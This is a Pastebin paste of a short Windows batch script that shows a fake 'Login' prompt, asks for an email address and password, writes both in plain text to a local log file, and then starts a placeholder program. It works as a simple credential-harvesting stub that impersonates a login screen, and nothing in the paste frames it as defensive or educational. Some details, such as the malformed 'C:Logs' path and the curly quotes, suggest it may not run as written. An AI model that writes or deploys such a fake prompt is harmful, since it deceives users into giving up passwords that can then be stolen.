Guest User

Untitled

a guest
Jan 8th, 2018
34
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.25 KB | None | 0 0
  1. @echo off
  2. color a
  3. title Login
  4. cls
  5. echo Please Enter Your Email Address And Password
  6. echo.
  7. echo.
  8. cd “C:Logs”
  9. set /p user=Username:
  10. set /p pass=Password:
  11. echo Username=”%user%” Password=”%pass%” >> Log.txt
  12. start >>Program Here<<
  13. exit
Add Comment
Please, Sign In to add comment